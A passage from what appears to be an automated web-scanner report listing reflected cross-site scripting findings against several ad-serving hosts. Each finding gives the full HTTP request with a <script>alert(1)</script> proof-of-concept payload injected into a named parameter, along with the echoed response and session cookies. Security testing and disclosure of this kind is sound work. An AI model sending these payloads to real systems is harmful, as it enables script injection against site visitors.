ar.c3VJScollection[a]=window.c3Vinter}else this.C3VTcallVar.c3VJScollection[a]=new c3VTJSInter();this.C3VTcallVar.c3VJScollection[a].loadNewP();this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnid='adver1e731<script>alert(1)</script>445a490afc6';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScid='480';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuid='451931075376';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='8977705271308225947';th
...[SNIP]...

3.3. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://480-adver-view.c3metrics.com
Path:	/c3VTabstrct-6-2.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 1e336<script>alert(1)</script>3589d742e15 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=/1e336<script>alert(1)</script>3589d742e15&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308225195243&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fburp%2Fshow%2F3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=451931075376; 480-VT=adver_05-21-2011-12-34-28_14859001441305981268; SERVERID=s3

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 12:06:22 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_06-16-2011-11-53-17; expires=Sun, 19-Jun-2011 12:06:22 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=adver_06-16-2011-12-06-22_12955713981308225982; expires=Tue, 14-Jun-2016 12:06:22 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_12955713981308225982; expires=Thu, 16-Jun-2011 12:21:22 GMT; path=/; domain=c3metrics.com
Content-Length: 6680
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
c3VJSnuid='12955713981308225982';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='/1e336<script>alert(1)</script>3589d742e15';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScallurl=this.C3VTcallVar.c3VJScollection[a].C3VJSFindBaseurl(c3VTconsts.c3VJSconst.c3VJS
...[SNIP]...

3.4. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [rv parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://480-adver-view.c3metrics.com
Path:	/c3VTabstrct-6-2.php

Issue detail

The value of the rv request parameter is copied into the HTML document as plain text between tags. The payload 55dbd<script>alert(1)</script>2614bb87189 was submitted in the rv parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=55dbd<script>alert(1)</script>2614bb87189&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308225195243&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fburp%2Fshow%2F3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=451931075376; 480-VT=adver_05-21-2011-12-34-28_14859001441305981268; SERVERID=s3

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 12:06:01 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_06-16-2011-11-53-17; expires=Sun, 19-Jun-2011 12:06:01 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=adver_06-16-2011-12-06-01_10290211371308225961; expires=Tue, 14-Jun-2016 12:06:01 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_10290211371308225961; expires=Thu, 16-Jun-2011 12:21:01 GMT; path=/; domain=c3metrics.com
Content-Length: 6691
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
='451931075376';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='10290211371308225961';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='55dbd<script>alert(1)</script>2614bb87189';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScallurl=this.C3VTcallVar.c3VJSc
...[SNIP]...

3.5. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [t parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://480-adver-view.c3metrics.com
Path:	/c3VTabstrct-6-2.php

Issue detail

The value of the t request parameter is copied into the HTML document as plain text between tags. The payload 24b11<script>alert(1)</script>54d7f3efbff was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=7224b11<script>alert(1)</script>54d7f3efbff&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308225195243&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fburp%2Fshow%2F3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=451931075376; 480-VT=adver_05-21-2011-12-34-28_14859001441305981268; SERVERID=s3

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 12:05:58 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_06-16-2011-11-53-17; expires=Thu, 12-Apr-2012 12:05:58 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=adver_06-16-2011-12-05-58_6168386421308225958; expires=Tue, 14-Jun-2016 12:05:58 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_6168386421308225958; expires=Thu, 16-Jun-2011 12:20:58 GMT; path=/; domain=c3metrics.com
Content-Length: 6691
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
d='480';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuid='451931075376';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='6168386421308225958';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='7224b11<script>alert(1)</script>54d7f3efbff';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3V
...[SNIP]...

3.6. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [uid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://480-adver-view.c3metrics.com
Path:	/c3VTabstrct-6-2.php

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload 11f14<script>alert(1)</script>62e11e6151f was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=11f14<script>alert(1)</script>62e11e6151f&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308225195243&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fburp%2Fshow%2F3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=451931075376; 480-VT=adver_05-21-2011-12-34-28_14859001441305981268; SERVERID=s3

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 12:06:03 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_06-16-2011-11-53-17; expires=Sun, 19-Jun-2011 12:06:03 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=adver_06-16-2011-12-06-03_6031987571308225963; expires=Tue, 14-Jun-2016 12:06:03 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_6031987571308225963; expires=Thu, 16-Jun-2011 12:21:03 GMT; path=/; domain=c3metrics.com
Content-Length: 6678
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
S.c3VJSnuid='6031987571308225963';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='11f14<script>alert(1)</script>62e11e6151f';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScallurl=this.C3VTcallVar.c3VJScollection[a].C3VJSFindBaseurl(c3VTconsts.c3VJSconst.c3VJS
...[SNIP]...

3.7. http://480-adver-view.c3metrics.com/v.js [cid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://480-adver-view.c3metrics.com
Path:	/v.js

Issue detail

The value of the cid request parameter is copied into the HTML document as plain text between tags. The payload b5b27<script>alert(1)</script>909fba1ee2d was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v.js?id=adver&cid=480b5b27<script>alert(1)</script>909fba1ee2d&t=72 HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308225880353&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=451931075376; SERVERID=s3; 480-SM=adver_06-16-2011-11-53-17; 480-VT=adver_06-16-2011-11-53-17_12223990061308225197; 480-nUID=adver_12223990061308225197

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 12:51:38 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Content-Length: 1049
Connection: close
Content-Type: text/html

if(!window.c3VTconstVal){c3VTconstVals={c3VJSconst:{c3VJSscriptLimit:0,c3VJScollection:new Array(),c3VJSurl:'v.js',c3VTJSurl:'c3VTabstrct-6-2.php'}};window.c3VTconstVal=c3VTconstVals}if(!window.fireC3VTJSobj){function fireC3VTJS(){this.fireCall=function(){var a=c3VTconstVal.c3VJSconst.c3VJSurl+'.*$';var b=c3VTconstVal.c3VJSconst.c3VTJSurl+"?id=adver&cid=480b5b27<script>alert(1)</script>909fba1ee2d&t=72&rv=&uid=&td=";var c=document.getElementsByTagName('script')[0];var e=document.createElement('script');e.type='text/javascript';e.async=true;e.src='http://480-adver-view.c3metrics.com/'+b;var r=ne
...[SNIP]...

3.8. http://480-adver-view.c3metrics.com/v.js [id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://480-adver-view.c3metrics.com
Path:	/v.js

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 3741f<script>alert(1)</script>6db0d1a43a7 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v.js?id=adver3741f<script>alert(1)</script>6db0d1a43a7&cid=480&t=72 HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308225880353&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=451931075376; SERVERID=s3; 480-SM=adver_06-16-2011-11-53-17; 480-VT=adver_06-16-2011-11-53-17_12223990061308225197; 480-nUID=adver_12223990061308225197

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 12:51:35 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Content-Length: 1049
Connection: close
Content-Type: text/html

if(!window.c3VTconstVal){c3VTconstVals={c3VJSconst:{c3VJSscriptLimit:0,c3VJScollection:new Array(),c3VJSurl:'v.js',c3VTJSurl:'c3VTabstrct-6-2.php'}};window.c3VTconstVal=c3VTconstVals}if(!window.fireC3VTJSobj){function fireC3VTJS(){this.fireCall=function(){var a=c3VTconstVal.c3VJSconst.c3VJSurl+'.*$';var b=c3VTconstVal.c3VJSconst.c3VTJSurl+"?id=adver3741f<script>alert(1)</script>6db0d1a43a7&cid=480&t=72&rv=&uid=&td=";var c=document.getElementsByTagName('script')[0];var e=document.createElement('script');e.type='text/javascript';e.async=true;e.src='http://480-adver-view.c3metrics.com/'+b;
...[SNIP]...

3.9. http://480-adver-view.c3metrics.com/v.js [t parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://480-adver-view.c3metrics.com
Path:	/v.js

Issue detail

The value of the t request parameter is copied into the HTML document as plain text between tags. The payload ce182<script>alert(1)</script>4969303c7e5 was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v.js?id=adver&cid=480&t=72ce182<script>alert(1)</script>4969303c7e5 HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308225880353&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=451931075376; SERVERID=s3; 480-SM=adver_06-16-2011-11-53-17; 480-VT=adver_06-16-2011-11-53-17_12223990061308225197; 480-nUID=adver_12223990061308225197

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 12:51:40 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Content-Length: 1049
Connection: close
Content-Type: text/html

if(!window.c3VTconstVal){c3VTconstVals={c3VJSconst:{c3VJSscriptLimit:0,c3VJScollection:new Array(),c3VJSurl:'v.js',c3VTJSurl:'c3VTabstrct-6-2.php'}};window.c3VTconstVal=c3VTconstVals}if(!window.fireC3VTJSobj){function fireC3VTJS(){this.fireCall=function(){var a=c3VTconstVal.c3VJSconst.c3VJSurl+'.*$';var b=c3VTconstVal.c3VJSconst.c3VTJSurl+"?id=adver&cid=480&t=72ce182<script>alert(1)</script>4969303c7e5&rv=&uid=&td=";var c=document.getElementsByTagName('script')[0];var e=document.createElement('script');e.type='text/javascript';e.async=true;e.src='http://480-adver-view.c3metrics.com/'+b;var r=new Reg
...[SNIP]...

3.10. http://a.rfihub.com/sed [pa parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.rfihub.com
Path:	/sed

Issue detail

The value of the pa request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d91a9'><script>alert(1)</script>8c7a9ddaf6f was submitted in the pa parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sed?w=300&h=250&re=12387&pv=0&ra=3055140830.8481068485217647&rb=445&ca=&rc=&rd=http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%253Fsa%253Dl%2526ai%253DBGZxhZij7TY_LHIuY6QbcnsjECc-Bso8Cj9qbsyKb7MqEJwAQARgBIAA4AVCAx-HEBGDJ1vKGyKP8GoIBF2NhLXB1Yi01NjcyNTU3NDU3ODM0NDU0oAGz7MfrA7IBD3NlYXJjaC5jbmJjLmNvbboBCjMwMHgyNTBfYXPIAQnaAZ8BaHR0cDovL3NlYXJjaC5jbmJjLmNvbS9tYWluLmRvP3RhcmdldD1hbGwma2V5d29yZHM9eHNzM2EzNGIlM0Mvc2NyaXB0JTNFJTNDc2NyaXB0JTNFYWxlcnQoMSklM0Mvc2NyaXB0JTNFN2M1ZmE1NGJhMzZjY2E2OCZjYXRlZ29yaWVzPWV4Y2x1ZGUmc2VhcmNoYm94aW5wdXQ9eHNzmALyEcACBMgCze_PDqgDAfUDAgAARPUDIAAAAIAGocWLibeSzNGRAQ%2526num%253D1%2526sig%253DAGiWqtxiB7PhdyqkGidLM7p1mIFKK9-TJg%2526client%253Dca-pub-5672557457834454%2526adurl%253D&ua=&ub=&uc=&ud=&ue=&pa=ppre3055140816039d91a9'><script>alert(1)</script>8c7a9ddaf6f&pb=&pc=&pd=&pg=&ct=1308305514083&co=false&ep=TfsoZgAHJY8K2kwLmJIPXHR4qq0JxG4Pwd52ow&ri=4dfb286607258fada4cb9892f5c1&rs=4355cd3c1f5990ce.anonymous.google&ai=19789&rt=23252&pe=http%3A%2F%2Fsearch.cnbc.com%2Fmain.do%3Ftarget%3Dall%26keywords%3Dxss3a34b%253C%2Fscript%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E7c5fa54ba36cca68%26categories%3Dexclude%26searchboxinput%3Dxss&pf=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue HTTP/1.1
Host: a.rfihub.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss3a34b%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E7c5fa54ba36cca68&categories=exclude&searchboxinput=xss
Cookie: g="aABgmj8uw==BCan85n-7WKY7Ss|20285|92765|1041137|18405|1518|101707|445|43622|8722AAABL-SS69E="; c="aAGG0IReg==AFd1518AB1AAABL-SS69A=AFv3828AB1AAABL-SS69A=AGu23820AB1AAABL-SS69A=AGt23820AB1AAABL-SS69A=AGb20285AB1AAABL-SS69A=AGa20285AB1AAABL-SS69A="; s="aAC7BDsnw==AE9479AN1294103956000AAABL-SS69A=AE8438AN1275963655000AAABL-SS69A="; a1=1CAESEA0pzwV4-SdN2wuhHcO4rdI; t=1305209963284; a2=2724386019227846218; t1=1305209966477; a=c615022824147045895; o=1-emLGD8YOQiy1; r=1305209924560; m="aAC4IU7vg==AI20474259AAABL_5mTvg=AI20474259AAABL_5k7_k="; u="aABpVi0zA==AI89bBrQ==AAABL_5mTvg="; f="aAC9KJdew==AK1305643118AB2AAABL_5mTvc=AK1305209924AB1AAABL-SS69A="; e=cb

Response

HTTP/1.1 200 OK
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: g="aAD-gyS2A==BCaWNDU5U7Xe6bm|19789|90461|1862541|19370|1504|101707|445|51259|8661AAABMJ0W2Rc=BCaqN5EtAqqMvGW|19789|90461|1862541|19370|1504|101707|445|51259|8661AAABMJ0V31g=BCan85n-7WKY7Ss|20285|92765|1041137|18405|1518|101707|445|43622|8722AAABL-SS69E=";Version=1;Path=/;Domain=.rfihub.com;Expires=Sun, 16-Dec-2012 10:12:58 GMT;Max-Age=47347200
Expires: Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: u="aABrIjHsQ==AI89bBrQ==AAABMJ0W2RY=";Version=1;Path=/;Domain=.rfihub.com;Expires=Sun, 16-Dec-2012 10:12:58 GMT;Max-Age=47347200
Set-Cookie: c="aAMtdorsA==AFd1504AB2AAABMJ0W2RY=AFv3788AB2AAABMJ0W2RY=AGu23252AB2AAABMJ0W2RY=AGt23252AB2AAABMJ0W2RY=AGb19789AB2AAABMJ0W2RY=AGa19789AB2AAABMJ0W2RY=AFd1518AB1AAABL-SS69A=AFv3828AB1AAABL-SS69A=AGu23820AB1AAABL-SS69A=AGt23820AB1AAABL-SS69A=AGb20285AB1AAABL-SS69A=AGa20285AB1AAABL-SS69A=";Version=1;Path=/;Domain=.rfihub.com;Expires=Sun, 16-Dec-2012 10:12:58 GMT;Max-Age=47347200
Set-Cookie: f="aADo4ev4Q==AK1308305514AB2AAABMJ0W2RY=AK1305643118AB2AAABL_5mTvc=AK1305209924AB1AAABL-SS69A=";Version=1;Path=/;Domain=.rfihub.com;Expires=Sun, 16-Dec-2012 10:12:58 GMT;Max-Age=47347200
Set-Cookie: s="aACO4JH0g==AE9479AN1294103956000AAABMJ0W2RY=AE8438AN1275963655000AAABMJ0V31c=";Version=1;Path=/;Domain=.rfihub.com;Expires=Sun, 16-Dec-2012 10:12:58 GMT;Max-Age=47347200
Set-Cookie: e=cl;Path=/;Domain=.rfihub.com;Expires=Sun, 16-Dec-2012 10:12:58 GMT
Content-Length: 1743

<html><body><span id="__rfi" style="height:0px; width:0px"><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N5763.150363.ROCKETFUEL.COM/B5470633.7;sz=300x250;ord=1308305578262;click
...[SNIP]...
width=0 height=0 src='http://a.rfihub.com/tk.gif?rb=445&re=12387&aa=19789,90461,19370,1862541,1504,23252,WNDU5U7Xe6bm,%22http%3A%2F%2Frocketfuelinc.com%22,901,3788,51259,2390,8661&pa=ppre3055140816039d91a9'><script>alert(1)</script>8c7a9ddaf6f&id=&ra=3055782630.7328883110626538'>
...[SNIP]...

3.11. http://ad.doubleclick.net/adi/N5823.RealMedia/B5598690.4 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.RealMedia/B5598690.4

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59809"><script>alert(1)</script>f3cd1e20131 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5823.RealMedia/B5598690.4;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/L30/1199171978/Top1/USNetwork/BCN2011050712_001_HP/HP_728x90.html/726348573830336e374e674144526a62?;ord=1199171978?&59809"><script>alert(1)</script>f3cd1e20131=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x26f73e.js&size_id=2&account_id=6451&site_id=11953&size=728x90
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 810
Date: Thu, 16 Jun 2011 15:52:46 GMT

<iframe width="728px" height="90px" marginHeight="0" src="http://dar.youknowbest.com/?afid=1304&re_click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b28/17/ba/%2a/e%3B242318863%3B0-0%3B0%3B65145569%3B34
...[SNIP]...
twork.realmedia.com/RealMedia/ads/click_lx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/L30/1199171978/Top1/USNetwork/BCN2011050712_001_HP/HP_728x90.html/726348573830336e374e674144526a62?&AD_CALL_ID=1199171978?&59809"><script>alert(1)</script>f3cd1e20131=1&AD_ID=&BEHAVIOR_SIGNAL_ID=&CHANNEL_ID=&LINE_ITEM_ID=&PUBLISHER_ID=&SITE_ID=&DFA_BuyId=5598690&DFA_PlacementId=65145569&DFA_AdId=242318863&DFA_CreativeId=42541965&DFA_SiteId=769318" frameBorder="0" a
...[SNIP]...

3.12. http://ad.doubleclick.net/adi/N5823.RealMedia/B5598690.4 [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.RealMedia/B5598690.4

Issue detail

The value of the sz request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81684"><script>alert(1)</script>19274c0fab6 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5823.RealMedia/B5598690.4;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/L30/1199171978/Top1/USNetwork/BCN2011050712_001_HP/HP_728x90.html/726348573830336e374e674144526a62?;ord=1199171978?81684"><script>alert(1)</script>19274c0fab6 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
